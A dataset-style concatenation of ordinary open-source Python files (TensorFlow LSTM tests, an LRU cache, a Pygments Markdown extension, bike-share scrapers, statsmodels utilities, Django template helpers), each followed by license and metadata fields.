x = tf.zeros([1, 3]) # Test BasicLSTMCell with input_size != num_units.
c = tf.zeros([1, 2])
h = tf.zeros([1, 2])
state = tf.nn.rnn_cell.LSTMStateTuple(c, h)
cell = tf.contrib.rnn.LayerNormBasicLSTMCell(2)
g, out_m = cell(x, state)
sess.run([tf.initialize_all_variables()])
res = sess.run([g, out_m],
{
x.name: np.array([[1., 1., 1.]]),
c.name: 0.1 * np.asarray([[0, 1]]),
h.name: 0.1 * np.asarray([[2, 3]]),
})
expected_h = np.array([[-0.38079708, 0.38079708]])
expected_c = np.array([[-1.0, 1.0]])
self.assertEqual(len(res), 2)
self.assertAllClose(res[0], expected_h, 1e-5)
self.assertAllClose(res[1].c, expected_c, 1e-5)
self.assertAllClose(res[1].h, expected_h, 1e-5)
def testBasicLSTMCellWithStateTuple(self):
with self.test_session() as sess:
with tf.variable_scope("root", initializer=tf.constant_initializer(0.5)):
x = tf.zeros([1, 2])
c0 = tf.zeros([1, 2])
h0 = tf.zeros([1, 2])
state0 = tf.nn.rnn_cell.LSTMStateTuple(c0, h0)
c1 = tf.zeros([1, 2])
h1 = tf.zeros([1, 2])
state1 = tf.nn.rnn_cell.LSTMStateTuple(c1, h1)
cell = tf.contrib.rnn.LayerNormBasicLSTMCell(2)
cell = tf.nn.rnn_cell.MultiRNNCell([cell] * 2)
h, (s0, s1) = cell(x, (state0, state1))
sess.run([tf.initialize_all_variables()])
res = sess.run([h, s0, s1],
{
x.name: np.array([[1., 1.]]),
c0.name: 0.1 * np.asarray([[0, 1]]),
h0.name: 0.1 * np.asarray([[2, 3]]),
c1.name: 0.1 * np.asarray([[4, 5]]),
h1.name: 0.1 * np.asarray([[6, 7]]),
})
expected_h = np.array([[-0.38079708, 0.38079708]])
expected_h0 = np.array([[-0.38079708, 0.38079708]])
expected_c0 = np.array([[-1.0, 1.0]])
expected_h1 = np.array([[-0.38079708, 0.38079708]])
expected_c1 = np.array([[-1.0, 1.0]])
self.assertEqual(len(res), 3)
self.assertAllClose(res[0], expected_h, 1e-5)
self.assertAllClose(res[1].c, expected_c0, 1e-5)
self.assertAllClose(res[1].h, expected_h0, 1e-5)
self.assertAllClose(res[2].c, expected_c1, 1e-5)
self.assertAllClose(res[2].h, expected_h1, 1e-5)
def testBasicLSTMCellWithDropout(self):
def _is_close(x, y, digits=4):
delta = x - y
return delta < 10 ** (-digits)
def _is_close_in(x, items, digits=4):
for i in items:
if _is_close(x, i, digits):
return True
return False
keep_prob = 0.5
c_high = 2.9998924946
c_low = 0.999983298578
h_low = 0.761552567265
h_high = 0.995008519604
num_units = 5
allowed_low = [2, 3]
with self.test_session() as sess:
with tf.variable_scope("other", initializer=tf.constant_initializer(1)):
x = tf.zeros([1, 5])
c = tf.zeros([1, 5])
h = tf.zeros([1, 5])
state = tf.nn.rnn_cell.LSTMStateTuple(c, h)
cell = tf.contrib.rnn.LayerNormBasicLSTMCell(
num_units, layer_norm=False, dropout_keep_prob=keep_prob)
g, s = cell(x, state)
sess.run([tf.initialize_all_variables()])
res = sess.run([g, s],
{
x.name: np.ones([1, 5]),
c.name: np.ones([1, 5]),
h.name: np.ones([1, 5]),
})
# Since the returned tensors are of size [1,n]
# get the first component right now.
actual_h = res[0][0]
actual_state_c = res[1].c[0]
actual_state_h = res[1].h[0]
# For each item in `c` (the cell inner state) check that
# it is equal to one of the allowed values `c_high` (not
# dropped out) or `c_low` (dropped out) and verify that the
# corresponding item in `h` (the cell activation) is coherent.
# Count the dropped activations and check that their number is
# coherent with the dropout probability.
dropped_count = 0
self.assertTrue((actual_h == actual_state_h).all())
for citem, hitem in zip(actual_state_c, actual_state_h):
self.assertTrue(_is_close_in(citem, [c_low, c_high]))
if _is_close(citem, c_low):
self.assertTrue(_is_close(hitem, h_low))
dropped_count += 1
elif _is_close(citem, c_high):
self.assertTrue(_is_close(hitem, h_high))
self.assertIn(dropped_count, allowed_low)
if __name__ == "__main__":
tf.test.main()
| apache-2.0 | -455,738,782,028,795,970 | 46.887967 | 80 | 0.549548 | false |
gburd/dbsql | src/py/misc/lru.py | 1 | 5206 | #-*- coding: ISO-8859-1 -*-
#
# DBSQL - A SQL database engine.
#
# Copyright (C) 2007-2008 The DBSQL Group, Inc. - All rights reserved.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# There are special exceptions to the terms and conditions of the GPL as it
# is applied to this software. View the full text of the exception in file
# LICENSE_EXCEPTIONS in the directory of this software distribution.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# http://creativecommons.org/licenses/GPL/2.0/
#
# Copyright (C) 2004 Gerhard Häring <[email protected]>
#
# This software is provided 'as-is', without any express or implied
# warranty. In no event will the authors be held liable for any damages
# arising from the use of this software.
#
# Permission is granted to anyone to use this software for any purpose,
# including commercial applications, and to alter it and redistribute it
# freely, subject to the following restrictions:
#
# 1. The origin of this software must not be misrepresented; you must not
# claim that you wrote the original software. If you use this software
# in a product, an acknowledgment in the product documentation would be
# appreciated but is not required.
# 2. Altered source versions must be plainly marked as such, and must not be
# misrepresented as being the original software.
# 3. This notice may not be removed or altered from any source distribution.
# A simple LRU cache, which will be rewritten in C later
class Node:
def __init__(self, key, data):
self.key = key
self.data = data
self.count = 1
self.prev, self.next = None, None
class Cache:
def __init__(self, factory, maxlen):
self.first, self.last = None, None
self.maxlen = maxlen
self.mapping = {}
self.factory = factory
def get(self, key):
if key in self.mapping:
nd = self.mapping[key]
nd.count += 1
if nd.prev and nd.count > nd.prev.count:
ptr = nd.prev
while ptr.prev is not None and nd.count > ptr.prev.count:
ptr = ptr.prev
# Move nd before ptr
if nd.next:
nd.next.prev = nd.prev
else:
self.last = nd.prev
if nd.prev:
nd.prev.next = nd.next
if ptr.prev:
ptr.prev.next = nd
else:
self.first = nd
save = nd.next
nd.next = ptr
nd.prev = ptr.prev
if nd.prev is None:
self.first = nd
ptr.prev = nd
#ptr.next = save
else:
if len(self.mapping) == self.maxlen:
if self.last:
nd = self.last
self.mapping[self.last.key] = None
del self.mapping[self.last.key]
if nd.prev:
nd.prev.next = None
self.last = nd.prev
nd.prev = None
obj = self.factory(key)
nd = Node(key, obj)
nd.prev = self.last
nd.next = None
if self.last:
self.last.next = nd
else:
self.first = nd
self.last = nd
self.mapping[key] = nd
return nd.data
def display(self):
nd = self.first
while nd:
prevkey, nextkey = None, None
if nd.prev: prevkey = nd.prev.key
if nd.next: nextkey = nd.next.key
print "%4s <- %4s -> %s\t(%i)" % (prevkey, nd.key, nextkey, nd.count)
nd = nd.next
if __name__ == "__main__":
def create(s):
return s
import random
cache = Cache(create, 5)
if 1:
chars = list("abcdefghijklmnopqrstuvwxyz")
lst = []
for i in range(100):
idx = random.randint(0, len(chars) - 1)
what = chars[idx]
lst.append(what)
cache.get(chars[idx])
cache.display()
#print "-" * 50
#print lst
#print "-" * 50
else:
lst = \
['y', 'y', 'b', 'v', 'x', 'f', 'h', 'n', 'g', 'k', 'o', 'q', 'p', 'e', 'm', 'c', 't', 'y', 'c', 's', 'p', 's', 'j', 'm', \
'u', 'f', 'z', 'x', 'v', 'r', 'w', 'e', 'm', 'd', 'w', 's', 'b', 'r', 'd', 'e', 'h', 'g', 'e', 't', 'p', 'b', 'e', 'i', \
'g', 'n']
#lst = ['c', 'c', 'b', 'b', 'd', 'd', 'g', 'c', 'c', 'd']
for item in lst:
cache.get(item)
cache.display()
| gpl-3.0 | -7,226,144,713,881,507,000 | 33.657534 | 134 | 0.516135 | false |
emineKoc/WiseWit | wisewit_front_end/node_modules/pygmentize-bundled/vendor/pygments/external/markdown-processor.py | 42 | 2041 | # -*- coding: utf-8 -*-
"""
The Pygments Markdown Preprocessor
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This fragment is a Markdown_ preprocessor that renders source code
to HTML via Pygments. To use it, invoke Markdown like so::
import markdown
html = markdown.markdown(someText, extensions=[CodeBlockExtension()])
This uses CSS classes by default, so use
``pygmentize -S <some style> -f html > pygments.css``
to create a stylesheet to be added to the website.
You can then highlight source code in your markdown markup::
[sourcecode:lexer]
some code
[/sourcecode]
.. _Markdown: https://pypi.python.org/pypi/Markdown
:copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
# Options
# ~~~~~~~
# Set to True if you want inline CSS styles instead of classes
INLINESTYLES = False
import re
from markdown.preprocessors import Preprocessor
from markdown.extensions import Extension
from pygments import highlight
from pygments.formatters import HtmlFormatter
from pygments.lexers import get_lexer_by_name, TextLexer
class CodeBlockPreprocessor(Preprocessor):
pattern = re.compile(r'\[sourcecode:(.+?)\](.+?)\[/sourcecode\]', re.S)
formatter = HtmlFormatter(noclasses=INLINESTYLES)
def run(self, lines):
def repl(m):
try:
lexer = get_lexer_by_name(m.group(1))
except ValueError:
lexer = TextLexer()
code = highlight(m.group(2), lexer, self.formatter)
code = code.replace('\n\n', '\n \n').replace('\n', '<br />')
return '\n\n<div class="code">%s</div>\n\n' % code
joined_lines = "\n".join(lines)
joined_lines = self.pattern.sub(repl, joined_lines)
return joined_lines.split("\n")
class CodeBlockExtension(Extension):
def extendMarkdown(self, md, md_globals):
md.preprocessors.add('CodeBlockPreprocessor', CodeBlockPreprocessor(), '_begin')
| gpl-3.0 | -4,268,316,988,149,691,400 | 29.462687 | 88 | 0.644292 | false |
BenSto/pybikes | pybikes/keolis.py | 1 | 8806 | # -*- coding: utf-8 -*-
# Copyright (C) 2010-2012, eskerda <[email protected]>
# Distributed under the AGPL license, see LICENSE.txt
import re
import json
from lxml import etree
import lxml.html
from .base import BikeShareSystem, BikeShareStation
from . import utils
xml_parser = etree.XMLParser(recover = True)
_re_float = "([+-]?\\d*\\.\\d+)(?![-+0-9\\.])"
class Keolis(BikeShareSystem):
sync = True
meta = {
'system': 'Keolis',
'company': ['Keolis']
}
_re_fuzzle = '\"latitude\"\:\ \"{0}\"\,\ '\
'\"longitude\"\:\ \"{0}\"\,\ '\
'\"text\"\:\ \"(.*?)\"\,\ '\
'\"markername'.format(_re_float)
_re_num_name = "\#(\d+)\ \-\ (.*)" # #10 - Place Lyautey
def __init__(self, tag, meta, feed_url):
super(Keolis, self).__init__(tag, meta)
self.feed_url = feed_url
def update(self, scraper = None):
if scraper is None:
scraper = utils.PyBikesScraper()
raw_fuzzle = scraper.request(self.feed_url)
data = re.findall(Keolis._re_fuzzle, raw_fuzzle)
self.stations = map(KeolisStation, data)
class KeolisStation(BikeShareStation):
def __init__(self, data):
"""
fuzzle is something like
Must be utf8 encoded and string-escaped
<div class="gmap-popup">
<div class="gmap-infobulle">
<div class="gmap-titre">#16 - Universite Sud</div>
<div class="gmap-adresse">
AVENUE DE L'UNIVERSITE FACE A L'ENTREE DE L'UNIVERSITE
</div>
<div class="gmap-velos">
<table>
<tr>
<td class="ok">
<strong>9</strong> vélos disponibles
</td>
<td class="ok">
<strong>17</strong> places disponibles
</td>
<td>
<acronym title="Carte Bancaire">CB</acronym>
</td>
</tr>
</table>
</div>
<div class="gmap-datemaj">
dernière mise à jour il y a <strong>00 min</strong>
</div>
</div>
</div>
"""
super(KeolisStation, self).__init__()
fuzzle = lxml.html.fromstring(
data[2].encode('utf8').decode('string-escape')
)
num_name = re.findall(
Keolis._re_num_name,
fuzzle.xpath('//div[@class="gmap-titre"]/text()')[0]
)[0]
bikes_places_upd = fuzzle.xpath('//strong/text()')
# Will not use
# address = fuzzle.xpath('//div[@class="gmap-adresse"]/text()')[0]
self.latitude = float(data[0])
self.longitude = float(data[1])
self.name = num_name[1]
self.extra = {
'uid': int(num_name[0])
}
if len(bikes_places_upd) > 1:
self.bikes = int(bikes_places_upd[0])
self.free = int(bikes_places_upd[1])
self.extra['status'] = 'online'
else:
self.bikes = 0
self.free = 0
self.extra['status'] = 'offline'
class Keolis_v2(BikeShareSystem):
sync = False
meta = {
'system': 'Keolis',
'company': ['Keolis']
}
_list_url = '/stations/xml-stations.aspx'
_station_url = '/stations/xml-station.aspx?borne={id}'
def __init__(self, tag, feed_url, meta):
super(Keolis_v2, self).__init__(tag, meta)
self.feed_url = feed_url + self._list_url
self.station_url = feed_url + self._station_url
def update(self, scraper = None):
if scraper is None:
scraper = utils.PyBikesScraper()
raw_list = scraper.request(self.feed_url).encode('utf-16')
xml_list = etree.fromstring(raw_list, xml_parser)
stations = []
for index, marker in enumerate(xml_list.iter('marker')):
station = KeolisStation_v2(marker, self.station_url)
stations.append(station)
self.stations = stations
class KeolisStation_v2(BikeShareStation):
def __init__(self, marker, station_url):
super(KeolisStation_v2, self).__init__()
self.name = marker.get('name')
self.latitude = float(marker.get('lat'))
self.longitude = float(marker.get('lng'))
self.extra = {
'uid': int(marker.get('id'))
}
self._station_url = station_url.format(id = self.extra['uid'])
def update(self, scraper = None):
if scraper is None:
scraper = utils.PyBikesScraper()
raw_status = scraper.request(self._station_url).encode('utf-16')
xml_status = etree.fromstring(raw_status, xml_parser)
self.bikes = int(xml_status.find('bikes').text)
self.free = int(xml_status.find('attachs').text)
self.extra['address'] = xml_status.find('adress').text.title()
# TODO: Try to standarize these fields
# 0 means online, 1 means temporarily unavailable
# are there more status?
self.extra['status'] = xml_status.find('status').text
# payment: AVEC_TPE | SANS_TPE
# as in, accepts bank cards or not
self.extra['payment'] = xml_status.find('paiement').text
# Update time as in 47 seconds ago: '47 secondes'
self.extra['lastupd'] = xml_status.find('lastupd').text
class KeolisSTAR(BikeShareSystem):
meta = {
'system': 'Keolis',
'company': ['Keolis'],
}
# Rows: -1 gives us all the results without the need to paginate
BASE_URL = "https://data.explore.star.fr/api/records/1.0/search/?dataset={dataset}&rows=-1" # NOQA
def __init__(self, tag, dataset, meta):
super(KeolisSTAR, self).__init__(tag, meta)
self.feed_url = KeolisSTAR.BASE_URL.format(dataset=dataset)
self.meta['source'] = self.meta['source'].format(dataset=dataset)
def update(self, scraper=None):
scraper = scraper or utils.PyBikesScraper()
data = json.loads(scraper.request(self.feed_url))
records = map(lambda r: r['fields'], data['records'])
self.stations = map(KeolisSTARStation, records)
class KeolisSTARStation(BikeShareStation):
def __init__(self, fields):
name = fields['nom']
latitude, longitude = map(float, fields['coordonnees'])
bikes = int(fields['nombrevelosdisponibles'])
free = int(fields['nombreemplacementsdisponibles'])
extra = {
'slots': fields['nombreemplacementsactuels'],
'status': fields['etat'],
'uid': str(fields['idstation']),
'last_update': fields['lastupdate'],
'online': fields['etat'] == 'En fonctionnement'
}
super(KeolisSTARStation, self).__init__(name, latitude, longitude,
bikes, free, extra)
class VCub(BikeShareSystem):
meta = {
'system': 'Keolis',
'company': ['Keolis'],
}
def __init__(self, tag, meta, feed_url):
super(VCub, self).__init__(tag, meta)
self.feed_url = feed_url
def update(self, scraper=None):
scraper = scraper or utils.PyBikesScraper()
data = json.loads(scraper.request(self.feed_url))
station_dict = {station['id']: station for station in data['lists']}
for pred in data['predict']['predictions']['data']:
if pred['sid'] in station_dict:
station_dict[pred['sid']]['status'] = pred['status']
self.stations = map(VCubStation, station_dict.values())
class VCubStation(BikeShareStation):
def __init__(self, fields):
super(VCubStation, self).__init__()
self.name = fields['name']
self.latitude = float(fields['latitude'])
self.longitude = float(fields['longitude'])
self.extra = {
'uid': str(fields['id']),
'last_update': fields['updatedAt'],
'address': fields['address'],
'city': fields['city'],
'online': fields['connexionState'] == 'CONNECTEE',
'status': int(fields['status']) # 0: maintenance, 1: operating
}
if self.extra['status'] == 1 and self.extra['online']:
ebikes = int(fields['nbElectricBikeAvailable'])
manual_bikes = int(fields['nbBikeAvailable'])
self.bikes = ebikes + manual_bikes
self.free = int(fields['nbPlaceAvailable'])
self.extra['slots'] = self.bikes + self.free
self.extra['ebikes'] = ebikes
self.extra['has_ebikes'] = ebikes > 0
| lgpl-3.0 | 1,940,034,154,309,682,200 | 33.252918 | 106 | 0.536522 | false |
pprett/statsmodels | statsmodels/sandbox/utils_old.py | 6 | 4092 | import numpy as np
import numpy.linalg as L
import scipy.interpolate
import scipy.linalg
__docformat__ = 'restructuredtext'
def recipr(X):
"""
Return the reciprocal of an array, setting all entries less than or
equal to 0 to 0. Therefore, it presumes that X should be positive in
general.
"""
x = np.maximum(np.asarray(X).astype(np.float64), 0)
return np.greater(x, 0.) / (x + np.less_equal(x, 0.))
def mad(a, c=0.6745, axis=0):
"""
Median Absolute Deviation:
median(abs(a - median(a))) / c
"""
_shape = a.shape
a.shape = np.product(a.shape,axis=0)
m = np.median(np.fabs(a - np.median(a))) / c
a.shape = _shape
return m
def recipr0(X):
"""
Return the reciprocal of an array, setting all entries equal to 0
as 0. It does not assume that X should be positive in
general.
"""
test = np.equal(np.asarray(X), 0)
return np.where(test, 0, 1. / X)
def clean0(matrix):
"""
Erase columns of zeros: can save some time in pseudoinverse.
"""
colsum = np.add.reduce(matrix**2, 0)
val = [matrix[:,i] for i in np.flatnonzero(colsum)]
return np.array(np.transpose(val))
def rank(X, cond=1.0e-12):
"""
Return the rank of a matrix X based on its generalized inverse,
not the SVD.
"""
X = np.asarray(X)
if len(X.shape) == 2:
D = scipy.linalg.svdvals(X)
return int(np.add.reduce(np.greater(D / D.max(), cond).astype(np.int32)))
else:
return int(not np.alltrue(np.equal(X, 0.)))
def fullrank(X, r=None):
"""
Return a matrix whose column span is the same as X.
If the rank of X is known it can be specified as r -- no check
is made to ensure that this really is the rank of X.
"""
if r is None:
r = rank(X)
V, D, U = L.svd(X, full_matrices=0)
order = np.argsort(D)
order = order[::-1]
value = []
for i in range(r):
value.append(V[:,order[i]])
return np.asarray(np.transpose(value)).astype(np.float64)
class StepFunction:
"""
A basic step function: values at the ends are handled in the simplest
way possible: everything to the left of x[0] is set to ival; everything
to the right of x[-1] is set to y[-1].
Examples
--------
>>> from numpy import arange
>>> from nipy.fixes.scipy.stats.models.utils import StepFunction
>>>
>>> x = arange(20)
>>> y = arange(20)
>>> f = StepFunction(x, y)
>>>
>>> print f(3.2)
3.0
>>> print f([[3.2,4.5],[24,-3.1]])
[[ 3. 4.]
[ 19. 0.]]
"""
def __init__(self, x, y, ival=0., sorted=False):
_x = np.asarray(x)
_y = np.asarray(y)
if _x.shape != _y.shape:
raise ValueError, 'in StepFunction: x and y do not have the same shape'
if len(_x.shape) != 1:
raise ValueError, 'in StepFunction: x and y must be 1-dimensional'
self.x = np.hstack([[-np.inf], _x])
self.y = np.hstack([[ival], _y])
if not sorted:
asort = np.argsort(self.x)
self.x = np.take(self.x, asort, 0)
self.y = np.take(self.y, asort, 0)
self.n = self.x.shape[0]
def __call__(self, time):
tind = np.searchsorted(self.x, time) - 1
_shape = tind.shape
return self.y[tind]
def ECDF(values):
"""
Return the ECDF of an array as a step function.
"""
x = np.array(values, copy=True)
x.sort()
x.shape = np.product(x.shape,axis=0)
n = x.shape[0]
y = (np.arange(n) + 1.) / n
return StepFunction(x, y)
def monotone_fn_inverter(fn, x, vectorized=True, **keywords):
"""
Given a monotone function x (no checking is done to verify monotonicity)
and a set of x values, return an linearly interpolated approximation
to its inverse from its values on x.
"""
if vectorized:
y = fn(x, **keywords)
else:
y = []
for _x in x:
y.append(fn(_x, **keywords))
y = np.array(y)
a = np.argsort(y)
return scipy.interpolate.interp1d(y[a], x[a])
| bsd-3-clause | 2,588,370,655,548,307,500 | 25.4 | 83 | 0.572825 | false |
jezdez/kuma | kuma/core/helpers.py | 3 | 10377 | import datetime
import HTMLParser
import json
import urllib
import bleach
import jinja2
import pytz
from babel import localedata
from babel.dates import format_date, format_datetime, format_time
from babel.numbers import format_decimal
from django.conf import settings
from django.contrib.messages.storage.base import LEVEL_TAGS
from django.contrib.staticfiles.storage import staticfiles_storage
from django.template import defaultfilters
from django.utils.encoding import force_text
from django.utils.html import strip_tags
from django.utils.timezone import get_default_timezone
from django.utils.translation import ugettext_lazy as _
from django.utils.translation import ungettext
from jingo import env, register
from pytz import timezone
from soapbox.models import Message
from statici18n.templatetags.statici18n import statici18n
from urlobject import URLObject
from .exceptions import DateTimeFormatError
from .urlresolvers import reverse, split_path
htmlparser = HTMLParser.HTMLParser()
# Yanking filters from Django and 3rd party libs.
register.filter(strip_tags)
register.filter(defaultfilters.timesince)
register.filter(defaultfilters.truncatewords)
register.function(statici18n)
@register.filter
def paginator(pager):
"""Render list of pages."""
return Paginator(pager).render()
@register.function
def url(viewname, *args, **kwargs):
"""Helper for Django's ``reverse`` in templates."""
locale = kwargs.pop('locale', None)
return reverse(viewname, args=args, kwargs=kwargs, locale=locale)
class Paginator(object):
def __init__(self, pager):
self.pager = pager
self.max = 10
self.span = (self.max - 1) / 2
self.page = pager.number
self.num_pages = pager.paginator.num_pages
self.count = pager.paginator.count
pager.page_range = self.range()
pager.dotted_upper = self.num_pages not in pager.page_range
pager.dotted_lower = 1 not in pager.page_range
def range(self):
"""Return a list of page numbers to show in the paginator."""
page, total, span = self.page, self.num_pages, self.span
if total < self.max:
lower, upper = 0, total
elif page < span + 1:
lower, upper = 0, span * 2
elif page > total - span:
lower, upper = total - span * 2, total
else:
lower, upper = page - span, page + span - 1
return range(max(lower + 1, 1), min(total, upper) + 1)
def render(self):
c = {'pager': self.pager, 'num_pages': self.num_pages,
'count': self.count}
t = env.get_template('includes/paginator.html').render(c)
return jinja2.Markup(t)
@register.filter
def timesince(d, now=None):
"""Take two datetime objects and return the time between d and now as a
nicely formatted string, e.g. "10 minutes". If d is None or occurs after
now, return ''.
Units used are years, months, weeks, days, hours, and minutes. Seconds and
microseconds are ignored. Just one unit is displayed. For example,
"2 weeks" and "1 year" are possible outputs, but "2 weeks, 3 days" and "1
year, 5 months" are not.
Adapted from django.utils.timesince to have better i18n (not assuming
commas as list separators and including "ago" so order of words isn't
assumed), show only one time unit, and include seconds.
"""
if d is None:
return u''
chunks = [
(60 * 60 * 24 * 365, lambda n: ungettext('%(number)d year ago',
'%(number)d years ago', n)),
(60 * 60 * 24 * 30, lambda n: ungettext('%(number)d month ago',
'%(number)d months ago', n)),
(60 * 60 * 24 * 7, lambda n: ungettext('%(number)d week ago',
'%(number)d weeks ago', n)),
(60 * 60 * 24, lambda n: ungettext('%(number)d day ago',
'%(number)d days ago', n)),
(60 * 60, lambda n: ungettext('%(number)d hour ago',
'%(number)d hours ago', n)),
(60, lambda n: ungettext('%(number)d minute ago',
'%(number)d minutes ago', n)),
(1, lambda n: ungettext('%(number)d second ago',
'%(number)d seconds ago', n))]
if not now:
if d.tzinfo:
now = datetime.datetime.now(get_default_timezone())
else:
now = datetime.datetime.now()
# Ignore microsecond part of 'd' since we removed it from 'now'
delta = now - (d - datetime.timedelta(0, 0, d.microsecond))
since = delta.days * 24 * 60 * 60 + delta.seconds
if since <= 0:
# d is in the future compared to now, stop processing.
return u''
for i, (seconds, name) in enumerate(chunks):
count = since // seconds
if count != 0:
break
return name(count) % {'number': count}
@register.filter
def yesno(boolean_value):
return jinja2.Markup(_(u'Yes') if boolean_value else _(u'No'))
@register.filter
def entity_decode(str):
"""Turn HTML entities in a string into unicode."""
return htmlparser.unescape(str)
@register.function
def page_title(title):
return u'%s | MDN' % title
@register.filter
def level_tag(message):
return jinja2.Markup(force_text(LEVEL_TAGS.get(message.level, ''),
strings_only=True))
@register.filter
def isotime(t):
"""Date/Time format according to ISO 8601"""
if not hasattr(t, 'tzinfo'):
return
return _append_tz(t).astimezone(pytz.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
def _append_tz(t):
tz = pytz.timezone(settings.TIME_ZONE)
return tz.localize(t)
@register.function
def thisyear():
"""The current year."""
return jinja2.Markup(datetime.date.today().year)
@register.filter
def cleank(txt):
"""Clean and link some user-supplied text."""
return jinja2.Markup(bleach.linkify(bleach.clean(txt)))
@register.filter
def urlencode(txt):
"""Url encode a path."""
return urllib.quote_plus(txt.encode('utf8'))
@register.filter
def jsonencode(data):
return jinja2.Markup(json.dumps(data))
@register.function
def get_soapbox_messages(url):
_, path = split_path(url)
return Message.objects.match(path)
@register.function
def get_webfont_attributes(request):
"""
Return data attributes based on assumptions about if user has them cached
"""
if not request:
return ''
assume_loaded = 'true'
if request.META.get('HTTP_PRAGMA') == 'no-cache':
assume_loaded = 'false'
elif request.META.get('HTTP_CACHE_CONTROL') == 'no-cache':
assume_loaded = 'false'
elif request.COOKIES.get('ffo', 'false') == 'true':
assume_loaded = 'true'
else:
assume_loaded = 'false'
font_names = ['opensanslight', 'opensans']
font_attributes = ''
for font_name in font_names:
font_attributes += ' data-ffo-' + font_name + '=' + assume_loaded + ''
return font_attributes
@register.inclusion_tag('core/elements/soapbox_messages.html')
def soapbox_messages(soapbox_messages):
return {'soapbox_messages': soapbox_messages}
@register.function
def add_utm(url_, campaign, source='developer.mozilla.org', medium='email'):
"""Add the utm_* tracking parameters to a URL."""
url_obj = URLObject(url_).add_query_params({
'utm_campaign': campaign,
'utm_source': source,
'utm_medium': medium})
return str(url_obj)
def _babel_locale(locale):
"""Return the Babel locale code, given a normal one."""
# Babel uses underscore as separator.
return locale.replace('-', '_')
def _contextual_locale(context):
"""Return locale from the context, falling back to a default if invalid."""
locale = context['request'].LANGUAGE_CODE
if not localedata.exists(locale):
locale = settings.LANGUAGE_CODE
return locale
@register.function
@jinja2.contextfunction
def datetimeformat(context, value, format='shortdatetime', output='html'):
"""
Returns date/time formatted using babel's locale settings. Uses the
timezone from settings.py
"""
if not isinstance(value, datetime.datetime):
if isinstance(value, datetime.date):
# Turn a date into a datetime
value = datetime.datetime.combine(value,
datetime.datetime.min.time())
else:
# Expecting datetime value
raise ValueError
default_tz = timezone(settings.TIME_ZONE)
tzvalue = default_tz.localize(value)
user = context['request'].user
try:
if user.is_authenticated() and user.timezone:
user_tz = timezone(user.timezone)
tzvalue = user_tz.normalize(tzvalue.astimezone(user_tz))
except AttributeError:
pass
locale = _babel_locale(_contextual_locale(context))
# If within a day, 24 * 60 * 60 = 86400s
if format == 'shortdatetime':
# Check if the date is today
if value.toordinal() == datetime.date.today().toordinal():
formatted = _(u'Today at %s') % format_time(
tzvalue, format='short', locale=locale)
else:
formatted = format_datetime(tzvalue, format='short', locale=locale)
elif format == 'longdatetime':
formatted = format_datetime(tzvalue, format='long', locale=locale)
elif format == 'date':
formatted = format_date(tzvalue, locale=locale)
elif format == 'time':
formatted = format_time(tzvalue, locale=locale)
elif format == 'datetime':
formatted = format_datetime(tzvalue, locale=locale)
else:
# Unknown format
raise DateTimeFormatError
if output == 'json':
return formatted
return jinja2.Markup('<time datetime="%s">%s</time>' %
(tzvalue.isoformat(), formatted))
@register.function
@jinja2.contextfunction
def number(context, n):
"""Return the localized representation of an integer or decimal.
For None, print nothing.
"""
if n is None:
return ''
return format_decimal(n, locale=_babel_locale(_contextual_locale(context)))
@register.function
def static(path):
return staticfiles_storage.url(path)
| mpl-2.0 | -76,533,547,199,793,220 | 30.445455 | 79 | 0.630818 | false |
invenfantasy/software-factory | tools/sfmigration/examples/from_csv/export_issues.py | 1 | 2858 | #!/usr/bin/python
#
# Copyright (C) 2014 eNovance SAS <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os.path
from sfmigration.common.softwarefactory import SFRedmineMigrator
from sfmigration.common import utils
from sfmigration.issues.csvfile import CSVImporter, REDMINE_ISSUE_FIELDS
logger = utils.logger
def get_values(config_file='config.ini'):
# check config file is present or not
if not os.path.isfile(config_file):
logger.error("config file is missing")
raise
source_csv = {'csv_file': '',
'fieldnames': ''}
for key in source_csv.iterkeys():
source_csv[key] = utils.get_config_value(config_file,
'CSV', key)
mapping = {}
for field in REDMINE_ISSUE_FIELDS:
mapping[field] = utils.get_config_value(config_file,
'CSV', field)
source_csv['fieldnames_mapping'] = mapping
dest_redmine = {'username': '', 'password': '',
'id': '', 'url': '', 'name': '',
'sf_domain': '', 'versions_to_skip': [],
'issues_to_skip': []}
for key in dest_redmine.iterkeys():
dest_redmine[key] = utils.get_config_value(config_file,
'DEST_REDMINE', key)
# if url ends with backslash, remove it before use.
if dest_redmine['url'].endswith('/'):
dest_redmine['url'] = dest_redmine['url'][:-1]
versions_to_skip = utils.get_config_value(config_file,
'SKIP', 'version_id')
if versions_to_skip:
dest_redmine['versions_to_skip'] = versions_to_skip.split(',')
issues_to_skip = utils.get_config_value(config_file,
'SKIP', 'issue_id')
if issues_to_skip:
dest_redmine['issues_to_skip'] = issues_to_skip.split(',')
dest_redmine['mapper'] = utils.ConfigMapper('config.ini')
return source_csv, dest_redmine
def main(config_file='config.ini'):
source_csv, dest_redmine = get_values()
try:
source = CSVImporter(**source_csv)
except Exception as e:
logger.error(str(e))
target = SFRedmineMigrator(**dest_redmine)
target.migrate(source)
if __name__ == "__main__":
main()
| apache-2.0 | 8,085,852,480,952,090,000 | 37.621622 | 75 | 0.59972 | false |
pdebuyl/numpy | numpy/lib/_datasource.py | 7 | 22792 | """A file interface for handling local and remote data files.
The goal of datasource is to abstract some of the file system operations
when dealing with data files so the researcher doesn't have to know all the
low-level details. Through datasource, a researcher can obtain and use a
file with one function call, regardless of location of the file.
DataSource is meant to augment standard python libraries, not replace them.
It should work seamlessly with standard file IO operations and the os
module.
DataSource files can originate locally or remotely:
- local files : '/home/guido/src/local/data.txt'
- URLs (http, ftp, ...) : 'http://www.scipy.org/not/real/data.txt'
DataSource files can also be compressed or uncompressed. Currently only
